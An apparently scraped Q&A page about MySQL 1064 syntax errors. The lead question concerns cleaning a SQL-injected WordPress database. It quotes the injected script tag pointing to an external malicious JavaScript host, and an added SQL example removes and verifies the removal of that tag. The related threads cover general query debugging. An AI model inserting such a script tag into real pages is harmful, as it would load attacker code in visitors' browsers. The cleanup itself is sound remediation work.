One of my clients has been hit by a SQL injection attack on his WordPress website. Now it's up to me to fix the mess. I barely have an understanding of SQL and PHP, though, so I am heavily reliant on Stack Overflow for advice. I couldn't, however, find the solution to my answer anywhere, including other websites.
The problem:
I'm trying to replace a string of text within a table column with nothing. I try to execute the following query; however, it marks an error on the question mark. For some reason it counts it as a parameter and I do not understand why.
UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascript’></script>”, ””));
Error message:
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1’ type=’text/javascri' at line 1
Could someone please advise me on how to fix the command or how to otherwise clean up the WordPress database from these scripts?
Thank you very much in advance!
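The 1064 error in the question comes from the typographic quotes (“ ” ’), which MySQL does not accept as string delimiters; a `?` inside a properly quoted literal is plain text, not a parameter. The following is an added example, not part of the original post, of the same cleanup written with ASCII quotes. It assumes the tag is stored as shown in the question but with straight apostrophes, and the backup table name `wp_posts_backup_injected` is hypothetical.

```sql
-- Added example; not from the original post.
-- Inner apostrophes are escaped by doubling them ('') so the literal works
-- regardless of the ANSI_QUOTES SQL mode.

-- 1. Inspect first: which rows carry the injected tag, and in what exact form?
--    GREATEST() keeps the start position valid when the match is near the
--    beginning of post_content.
SELECT ID,
       post_status,
       SUBSTRING(post_content,
                 GREATEST(1, LOCATE('donatelloflowfirstly.ga', post_content) - 25),
                 140) AS context
FROM wp_posts
WHERE post_content LIKE '%donatelloflowfirstly.ga%';

-- 2. Copy the affected rows aside so the change can be reviewed or undone.
--    (Hypothetical table name.)
CREATE TABLE wp_posts_backup_injected AS
SELECT *
FROM wp_posts
WHERE post_content LIKE '%donatelloflowfirstly.ga%';

-- 3. Remove the tag. If step 1 shows different quoting or a different
--    query string, copy the literal from that output instead.
UPDATE wp_posts
SET post_content = REPLACE(
        post_content,
        '<script src=''https://js.donatelloflowfirstly.ga/stat.js?n=ns1'' type=''text/javascript''></script>',
        '')
WHERE post_content LIKE '%donatelloflowfirstly.ga%';

-- 4. Verify: this should return 0. A non-zero count means some rows hold
--    a variant of the tag that the literal in step 3 did not match.
SELECT COUNT(*) AS remaining
FROM wp_posts
WHERE post_content LIKE '%donatelloflowfirstly.ga%';
```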
Related
I'm trying to execute a .sql script which inserts values into a database.
Problem is, there's some issues in the syntax of the script.
Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 0.078 sec
But the script is pretty large, a few MB, so I can't check manually where the error is. According to the error message it should be close to quotes, but sadly all the values inserted are on one line in the script file so the indication "on line 1" is not helpful at all.
Is there a way to get a precise position for the error? I'd like, in particular, the column number where the syntax is wrong. Is that possible?
I'm using a command of the type:
mysql -u root -p Wikicategory < path\to\script\script.sql
MySQL Workbench uses a different parser (ANTLR4 based) than the MySQL server (yacc based). ANTLR4 based parsers often (but not always) can report errors with a precise location.
I don't think the query is too large. If it were you would get a different error (because the connection buffer would not be large enough).
So, your best option is to reformat the query. For SELECTs you can use MySQL Workbench, but better try Visual Studio Code with the SQLTools plugin. Not the best results there either, but it seems to be able to reformat all types of queries.
Then run the script again to see if you get a better error location.
I have a database connected to Unity through a php script. This script lets me register an account and set it on a row on the database. So whenever I make a new account it creates a new row in my "Users" table.
Now my problem is that I get an error whenever I try to edit or delete a row by clicking on the edit or delete icon in phpMyAdmin. If I try to create a query manually it works in phpMyAdmin, but the query that phpMyAdmin tries to execute when I click the icon doesn't.
SQL query: Documentation Edit
SELECT * FROM `UserData`.`Users` WHERE ;
MySQL said: Documentation
#1064 - You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near '' at line 1
When I try to manually execute the similar correct query it works fine:
SELECT * FROM `UserData`.`Users` WHERE ID = 1 ;
Does anyone know the cause of this problem or maybe know a fix for it?
My server version
I have the same problem, and the workaround that worked for me was using the SQL shell tab with the corresponding SQL code for whatever I want to do - the error only occurs when I use the icons. Thus I think this must be a problem with the interface of phpMyAdmin/icons. This is annoying, but at least I haven't lost my SQL library.
If anyone has a better solution, I'd be keen to know. (I'm using phpMyAdmin 4.5.6.2 on Mac OS X 10.10.2)
You have to rename your tables without capital letters. Name them like userdata or user and so on...
I am using MySQL 5.1.5 on a Yahoo Sight Server, with phpMyAdmin as the database interface.
I use the following Query
UPDATE table_family SET last_name='Smith' WHERE id=1;
Then I get the following error:
Error There seems to be an error in your SQL query. The MySQL server
error output below, if there is any, may also help you in diagnosing
the problem
ERROR: Unknown Punctuation String # 34 STR: =\ SQL: UPDATE
table_family SET last_name=\'Smith\' WHERE id=1;
SQL query:
UPDATE table_family SET last_name=\'Smith\' WHERE id=1;
MySQL said: Documentation
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use
near '\'Smith\' WHERE id=1' at line 1
Ideas? I feel like it's an issue with the database, not with my code. The last_name field is a varchar(50). I actually opened a ticket with support on this issue, but it happened to me on two different domains I have with Yahoo, so that makes me think there is more going on than I know. I have done this with integer fields that don't require the (') single quote and have had no issues. I have also run my syntax through a local Access database I created just to make sure it wasn't a syntax issue. Worked perfectly first time. Then I had 2 database guys I know look at it. They think it's good too. So now I am lost.
Thanks for any help you can provide.
Andy
Is there somewhere you can input SQL to check syntax etc. because using it in Java just yields a really unhelpful error when trying to run the code: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near..."?
http://www.sqlfiddle.com/
Seems like what you are after.
You can set up the table structure in the left part of the window (CREATEs and INSERTs).
And try your desired SELECTs on the right.
UPDATE: Though I might add to this that the error you are receiving is in fact a MySQL error you will encounter there as well, but fiddling around can be more handy in a separate tool.
Are you looking for Show Warning and Show Error?
You can check here as well
You can check it in your phpmyadmin where you can just write and run the queries and see if it returns errors and/ or results.
You can also check your syntax at http://www.piliapp.com/mysql-syntax-check/
You can test your queries and also test if they return desired results at "http://www.martystepp.com/query/?username=cse154&password=cse154" this site provides test databases that are already built so you not only get the syntax right but it provides against logic errors.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near [random snippet of query code]
I am very rarely able to deduce something of value from MySQL errors like that one, is there any way to get some more specific data?
I've seen people dismiss this question saying that it's impossible to get exact error data because of how MySQL's syntax works. Is that really so?
It's not only MySQL that gives syntax errors like that, MS SQL Server gives very similar messages.
The error message is very accurate in the sense that the code shown in the error message is the exact position where the parser determined that it could no longer go on with parsing the query.
However, the actual error in the query is often somewhat earlier in the query. If you for example misspelled "from" in a query as "fom", the parser will go on thinking that "fom" is an alias for the last field that came before that, and give you a syntax error when it finds a table name instead of the expected comma or "from" keyword. It will point to the table name as the position of the error instead of the misspelled keyword.
Sometimes it helps to break down your query into several lines instead of just one long one. This will still show you only the approximate position of your error, but it might help a bit.